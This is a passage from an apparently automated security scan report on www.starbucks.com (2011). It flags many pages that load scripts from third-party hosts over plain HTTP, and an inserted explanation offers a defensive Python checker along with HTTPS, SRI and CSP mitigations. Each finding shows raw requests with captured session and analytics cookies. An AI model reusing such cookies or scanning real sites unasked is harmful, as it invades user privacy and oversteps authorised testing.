<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.34. http://www.starbucks.com/coffee/via/flavored-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via/flavored-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:35 GMT
Connection: close
Content-Length: 50132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.35. http://www.starbucks.com/coffee/via/instant-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via/instant-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:23 GMT
Connection: close
Content-Length: 50406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.36. http://www.starbucks.com/coffee/whole-bean-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:51 GMT
Connection: close
Content-Length: 50786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.37. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/africa-arabia HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:03 GMT
Connection: close
Content-Length: 41819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.38. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffee/whole-bean-coffee/asia-pacific HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:08 GMT
Connection: close
Content-Length: 41238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.39. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:31 GMT
Connection: close
Content-Length: 43595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.40. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:00 GMT
Connection: close
Content-Length: 40159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.41. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:09:59 GMT
Connection: close
Content-Length: 40514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.42. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffee/whole-bean-coffee/latin-america HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:02 GMT
Connection: close
Content-Length: 46491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.43. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffee/whole-bean-coffee/multi-region-blends HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:17 GMT
Connection: close
Content-Length: 42728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.44. http://www.starbucks.com/coffeehouse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The response dynamically includes the following script from another domain (included four times in the page):

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:18 GMT
Connection: close
Content-Length: 52507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.45. http://www.starbucks.com/coffeehouse/community

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://widgets.twimg.com/j/2/widget.js
http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:30 GMT
Connection: close
Content-Length: 41445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<!-- Facebook Fan Box -->
               <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- Twitter Widget -->
               <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
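
Every finding in this section reports the same class of issue: a page on www.starbucks.com executes JavaScript fetched from a host it does not control (s7.addthis.com on almost every page, plus static.ak.connect.facebook.com and widgets.twimg.com on /coffeehouse/community), all over plain HTTP. Whoever controls that host, or the unencrypted path to it, gets script execution in the www.starbucks.com origin, with the session cookie shown in the request above in reach. The Python below is an added example, not part of this scanner report or of any Starbucks code; it implements the check the report is making. It runs over a constructed HTML sample that reuses the three includes reported for /coffeehouse/community and adds a same-origin, a scheme-relative (cdn.example.net is a made-up host) and an inline script to exercise the edge cases the check must get right.

```python
import re
from urllib.parse import urlsplit

# Constructed sample page. The three third-party includes are the ones the
# report shows for /coffeehouse/community; the same-origin, scheme-relative
# (cdn.example.net is a made-up host) and inline scripts are added to cover
# the cases a naive "src contains http://" check gets wrong.
SAMPLE_HTML = """
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="http://www.starbucks.com/js/local.js"></script>
<!-- Facebook Fan Box -->
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
<!-- Twitter Widget -->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
<SCRIPT SRC='//cdn.example.net/lib.js'></SCRIPT>
<script>var inline = 1;</script>
"""

# Matches the src attribute of a <script> start tag, either quote style, any case.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*(['\"])(.*?)\1",
                        re.IGNORECASE | re.DOTALL)


def script_sources(html):
    """All external script URLs in document order (inline scripts have no src)."""
    return [m.group(2).strip() for m in SCRIPT_SRC.finditer(html)]


def cross_domain_scripts(html, page_url):
    """(src, host) pairs for scripts served from a host other than the page's own.

    Relative paths resolve to the page host and are skipped; scheme-relative
    '//host/path' URLs do carry a host and are checked like absolute ones, and
    a URL fragment (the addthis '#username=...') does not affect the host.
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    hits = []
    for src in script_sources(html):
        host = (urlsplit(src).hostname or "").lower()
        if host and host != page_host:
            hits.append((src, host))
    return hits


def third_party_hosts(html, page_url):
    """Sorted, de-duplicated list of foreign hosts the page executes code from."""
    return sorted({host for _, host in cross_domain_scripts(html, page_url)})


if __name__ == "__main__":
    page = "http://www.starbucks.com/coffeehouse/community"
    for src, host in cross_domain_scripts(SAMPLE_HTML, page):
        print(f"{host:35} {src}")
    print("hosts:", third_party_hosts(SAMPLE_HTML, page))
```

The scanner rates this as Information because a third-party include is a trust decision rather than a bug in the page, but the list of hosts is what a reviewer wants: each one is a party whose compromise becomes a compromise of the site. Mitigations available today, which did not exist when this report was generated, are to serve both the page and the includes over HTTPS, pin static scripts with Subresource Integrity (a widget loader such as addthis changes too often to pin), and restrict script-src in a Content-Security-Policy to exactly the hosts this check enumerates.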

6.46. http://www.starbucks.com/coffeehouse/community/mystarbucksidea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/community/mystarbucksidea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:54 GMT
Connection: close
Content-Length: 41478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.47. http://www.starbucks.com/coffeehouse/entertainment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The response dynamically includes the following script from another domain (included four times in the page):

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/entertainment HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:33 GMT
Connection: close
Content-Length: 53938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.48. http://www.starbucks.com/coffeehouse/mobile-apps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/mobile-apps HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:52 GMT
Connection: close
Content-Length: 40391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.49. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/mobile-apps/mystarbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:04 GMT
Connection: close
Content-Length: 37791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.50. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
